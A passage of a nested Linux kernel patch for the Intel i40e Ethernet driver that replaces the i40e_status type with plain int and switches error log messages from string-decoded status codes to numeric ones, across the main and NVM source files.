+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ {
+ 	/* Commit temporary BW setting to permanent NVM image */
+ 	enum i40e_admin_queue_err last_aq_status;
+-	i40e_status ret;
+ 	u16 nvm_word;
++	int ret;
+ 
+ 	if (pf->hw.partition_id != 1) {
+ 		dev_info(&pf->pdev->dev,
+@@ -12576,8 +12575,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for read access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for read access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12593,8 +12592,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "NVM read error, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "NVM read error, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12607,8 +12606,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for write access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for write access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12627,8 +12626,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret)
+ 		dev_info(&pf->pdev->dev,
+-			 "BW settings NOT SAVED, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "BW settings NOT SAVED, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ bw_commit_out:
+ 
+@@ -12649,7 +12648,7 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ #define I40E_LINK_BEHAVIOR_WORD_LENGTH		0x1
+ #define I40E_LINK_BEHAVIOR_OS_FORCED_ENABLED	BIT(0)
+ #define I40E_LINK_BEHAVIOR_PORT_BIT_LENGTH	4
+-	i40e_status read_status = I40E_SUCCESS;
++	int read_status = I40E_SUCCESS;
+ 	u16 sr_emp_sr_settings_ptr = 0;
+ 	u16 features_enable = 0;
+ 	u16 link_behavior = 0;
+@@ -12682,8 +12681,8 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ 
+ err_nvm:
+ 	dev_warn(&pf->pdev->dev,
+-		 "total-port-shutdown feature is off due to read nvm error: %s\n",
+-		 i40e_stat_str(&pf->hw, read_status));
++		 "total-port-shutdown feature is off due to read nvm error: %d\n",
++		 read_status);
+ 	return ret;
+ }
+ 
+@@ -13028,7 +13027,7 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+ 	u8 type, filter_index;
+-	i40e_status ret;
++	int ret;
+ 
+ 	type = ti->type == UDP_TUNNEL_TYPE_VXLAN ? I40E_AQC_TUNNEL_TYPE_VXLAN :
+ 						   I40E_AQC_TUNNEL_TYPE_NGE;
+@@ -13036,8 +13035,8 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	ret = i40e_aq_add_udp_tunnel(hw, ntohs(ti->port), type, &filter_index,
+ 				     NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "add UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "add UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13052,12 +13051,12 @@ static int i40e_udp_tunnel_unset_port(struct net_device *netdev,
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_aq_del_udp_tunnel(hw, ti->hw_priv, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "delete UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "delete UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13946,8 +13945,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't get PF vsi config, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't get PF vsi config, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENOENT;
+@@ -13976,8 +13975,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						     pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13996,8 +13995,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -14019,9 +14018,9 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 				 * message and continue
+ 				 */
+ 				dev_info(&pf->pdev->dev,
+-					 "failed to configure TCs for main VSI tc_map 0x%08x, err %s aq_err %s\n",
++					 "failed to configure TCs for main VSI tc_map 0x%08x, err %d aq_err %s\n",
+ 					 enabled_tc,
+-					 i40e_stat_str(&pf->hw, ret),
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 			}
+@@ -14115,8 +14114,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 		if (ret) {
+ 			dev_info(&vsi->back->pdev->dev,
+-				 "add vsi failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "add vsi failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			ret = -ENOENT;
+@@ -14147,8 +14146,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* VSI is already added so not tearing that up */
+ 		ret = 0;
+@@ -14594,8 +14593,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						  &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14604,8 +14603,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						   &ets_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw ets config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw ets config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14801,8 +14800,8 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 	/* get a VEB from the hardware */
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't add VEB, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't add VEB, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+@@ -14812,16 +14811,16 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 					 &veb->stats_idx, NULL, NULL, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB statistics idx, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB statistics idx, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		i40e_aq_delete_element(&pf->hw, veb->seid, NULL);
+ 		return -ENOENT;
+@@ -15031,8 +15030,8 @@ int i40e_fetch_switch_configuration(struct i40e_pf *pf, bool printconfig)
+ 						&next_seid, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "get switch config failed err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "get switch config failed err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			kfree(aq_buf);
+@@ -15077,8 +15076,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 	ret = i40e_fetch_switch_configuration(pf, false);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't fetch switch config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't fetch switch config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -15104,8 +15103,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 						NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -15442,13 +15441,12 @@ static bool i40e_check_recovery_mode(struct i40e_pf *pf)
+  *
+  * Return 0 on success, negative on failure.
+  **/
+-static i40e_status i40e_pf_loop_reset(struct i40e_pf *pf)
++static int i40e_pf_loop_reset(struct i40e_pf *pf)
+ {
+ 	/* wait max 10 seconds for PF reset to succeed */
+ 	const unsigned long time_end = jiffies + 10 * HZ;
+-
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	while (ret != I40E_SUCCESS && time_before(jiffies, time_end)) {
+@@ -15494,9 +15492,9 @@ static bool i40e_check_fw_empr(struct i40e_pf *pf)
+  * Return 0 if NIC is healthy or negative value when there are issues
+  * with resets
+  **/
+-static i40e_status i40e_handle_resets(struct i40e_pf *pf)
++static int i40e_handle_resets(struct i40e_pf *pf)
+ {
+-	const i40e_status pfr = i40e_pf_loop_reset(pf);
++	const int pfr = i40e_pf_loop_reset(pf);
+ 	const bool is_empr = i40e_check_fw_empr(pf);
+ 
+ 	if (is_empr || pfr != I40E_SUCCESS)
+@@ -15635,13 +15633,15 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ #ifdef CONFIG_I40E_DCB
+ 	enum i40e_get_fw_lldp_status_resp lldp_status;
+-	i40e_status status;
+ #endif /* CONFIG_I40E_DCB */
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	static u16 pfs_found;
+ 	u16 wol_nvm_bits;
+ 	u16 link_status;
++#ifdef CONFIG_I40E_DCB
++	int status;
++#endif /* CONFIG_I40E_DCB */
+ 	int err;
+ 	u32 val;
+ 	u32 i;
+@@ -16010,8 +16010,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (err)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Reconfigure hardware for allowing smaller MSS in the case
+@@ -16029,8 +16029,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		msleep(75);
+ 		err = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (err)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -16162,8 +16162,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the requested speeds from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, false, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	pf->hw.phy.link_info.requested_speeds = abilities.link_speed;
+ 
+@@ -16173,8 +16173,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the supported phy types from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, true, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* make sure the MFS hasn't been set lower than the default */
+@@ -16245,7 +16245,7 @@ static void i40e_remove(struct pci_dev *pdev)
+ {
+ 	struct i40e_pf *pf = pci_get_drvdata(pdev);
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret_code;
++	int ret_code;
+ 	int i;
+ 
+ 	i40e_dbg_pf_exit(pf);
+@@ -16493,9 +16493,9 @@ static void i40e_pci_error_resume(struct pci_dev *pdev)
+ static void i40e_enable_mc_magic_wake(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u8 mac_addr[6];
+ 	u16 flags = 0;
++	int ret;
+ 
+ 	/* Get current MAC address in case it's an LAA */
+ 	if (pf->vsi[pf->lan_vsi] && pf->vsi[pf->lan_vsi]->netdev) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 3a38bf8bcde7e..17e3f26eee4a4 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -13,10 +13,10 @@
+  * in this file) as an equivalent of the FLASH part mapped into the SR.
+  * We are accessing FLASH always thru the Shadow RAM.
+  **/
+-i40e_status i40e_init_nvm(struct i40e_hw *hw)
++int i40e_init_nvm(struct i40e_hw *hw)
+ {
+ 	struct i40e_nvm_info *nvm = &hw->nvm;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 fla, gens;
+ 	u8 sr_size;
+ 
+@@ -52,12 +52,12 @@ i40e_status i40e_init_nvm(struct i40e_hw *hw)
+  * This function will request NVM ownership for reading
+  * via the proper Admin Command.
+  **/
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				       enum i40e_aq_resource_access_type access)
++int i40e_acquire_nvm(struct i40e_hw *hw,
++		     enum i40e_aq_resource_access_type access)
+ {
+-	i40e_status ret_code = 0;
+ 	u64 gtime, timeout;
+ 	u64 time_left = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+ 		goto i40e_i40e_acquire_nvm_exit;
+@@ -111,7 +111,7 @@ i40e_i40e_acquire_nvm_exit:
+  **/
+ void i40e_release_nvm(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_SUCCESS;
++	int ret_code = I40E_SUCCESS;
+ 	u32 total_delay = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+@@ -138,9 +138,9 @@ void i40e_release_nvm(struct i40e_hw *hw)
+  *
+  * Polls the SRCTL Shadow RAM register done bit.
+  **/
+-static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
++static int i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 srctl, wait_cnt;
+ 
+ 	/* Poll the I40E_GLNVM_SRCTL until the done bit is set */
+@@ -165,10 +165,10 @@ static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+  *
+  * Reads one 16 bit word from the Shadow RAM using the GLNVM_SRCTL register.
+  **/
+-static i40e_status i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
+-					    u16 *data)
++static int i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
++				    u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 sr_reg;
+ 
+ 	if (offset >= hw->nvm.sr_size) {
+@@ -216,13 +216,13 @@ read_nvm_exit:
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+-				    u8 module_pointer, u32 offset,
+-				    u16 words, void *data,
+-				    bool last_command)
++static int i40e_read_nvm_aq(struct i40e_hw *hw,
++			    u8 module_pointer, u32 offset,
++			    u16 words, void *data,
++			    bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -264,10 +264,10 @@ static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM using the AdminQ
+  **/
+-static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+-					 u16 *data)
++static int i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
++				 u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 
+ 	ret_code = i40e_read_nvm_aq(hw, 0x0, offset, 1, data, true);
+ 	*data = le16_to_cpu(*(__le16 *)data);
+@@ -286,8 +286,8 @@ static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+  * Do not use this function except in cases where the nvm lock is already
+  * taken via i40e_acquire_nvm().
+  **/
+-static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+-					u16 offset, u16 *data)
++static int __i40e_read_nvm_word(struct i40e_hw *hw,
++				u16 offset, u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_word_aq(hw, offset, data);
+@@ -303,10 +303,10 @@ static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM.
+  **/
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-			       u16 *data)
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
++		       u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_NVM_READ_REQUIRES_LOCK)
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -330,17 +330,17 @@ i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+  * @words_data_size: Words to read from NVM
+  * @data_ptr: Pointer to memory location where resulting buffer will be stored
+  **/
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr)
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr)
+ {
+-	i40e_status status;
+ 	u16 specific_ptr = 0;
+ 	u16 ptr_value = 0;
+ 	u32 offset = 0;
++	int status;
+ 
+ 	if (module_ptr != 0) {
+ 		status = i40e_read_nvm_word(hw, module_ptr, &ptr_value);
+@@ -406,10 +406,10 @@ enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+-					      u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
++				      u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u16 index, word;
+ 
+ 	/* Loop thru the selected region */
+@@ -437,13 +437,13 @@ static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
+-					   u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
++				   u16 *words, u16 *data)
+ {
+-	i40e_status ret_code;
+-	u16 read_size;
+ 	bool last_cmd = false;
+ 	u16 words_read = 0;
++	u16 read_size;
++	int ret_code;
+ 	u16 i = 0;
+ 
+ 	do {
+@@ -493,9 +493,9 @@ read_nvm_buffer_aq_exit:
+  * Reads 16 bit words (data buffer) from the SR using the i40e_read_nvm_srrd()
+  * method.
+  **/
+-static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+-					  u16 offset, u16 *words,
+-					  u16 *data)
++static int __i40e_read_nvm_buffer(struct i40e_hw *hw,
++				  u16 offset, u16 *words,
++				  u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_buffer_aq(hw, offset, words, data);
+@@ -514,10 +514,10 @@ static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data)
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
++			 u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE) {
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -544,12 +544,12 @@ i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
+-				     u32 offset, u16 words, void *data,
+-				     bool last_command)
++static int i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
++			     u32 offset, u16 words, void *data,
++			     bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -594,14 +594,14 @@ static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
+  * is customer specific and unknown. Therefore, this function skips all maximum
+  * possible size of VPD (1kB).
+  **/
+-static i40e_status i40e_calc_nvm_checksum(struct i40e_hw *hw,
+-						    u16 *checksum)
++static int i40e_calc_nvm_checksum(struct i40e_hw *hw,
++				  u16 *checksum)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_virt_mem vmem;
+ 	u16 pcie_alt_module = 0;
+ 	u16 checksum_local = 0;
+ 	u16 vpd_module = 0;
++	int ret_code;
+ 	u16 *data;
+ 	u16 i = 0;
+ 
+@@ -675,11 +675,11 @@ i40e_calc_nvm_checksum_exit:
+  * on ARQ completion event reception by caller.
+  * This function will commit SR to NVM.
+  **/
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
++int i40e_update_nvm_checksum(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+-	u16 checksum;
+ 	__le16 le_sum;
++	int ret_code;
++	u16 checksum;
+ 
+ 	ret_code = i40e_calc_nvm_checksum(hw, &checksum);
+ 	if (!ret_code) {
+@@ -699,12 +699,12 @@ i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
+  * Performs checksum calculation and validates the NVM SW checksum. If the
+  * caller does not need checksum, the value can be NULL.
+  **/
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum)
++int i40e_validate_nvm_checksum(struct i40e_hw *hw,
++			       u16 *checksum)
+ {
+-	i40e_status ret_code = 0;
+-	u16 checksum_sr = 0;
+ 	u16 checksum_local = 0;
++	u16 checksum_sr = 0;
++	int ret_code = 0;
+ 
+ 	/* We must acquire the NVM lock in order to correctly synchronize the
+ 	 * NVM accesses across multiple PFs. Without doing so it is possible
+@@ -733,36 +733,36 @@ i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+ 	return ret_code;
+ }
+ 
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *errno);
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *errno);
+ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+ 						struct i40e_nvm_access *cmd,
+ 						int *perrno);
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno);
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
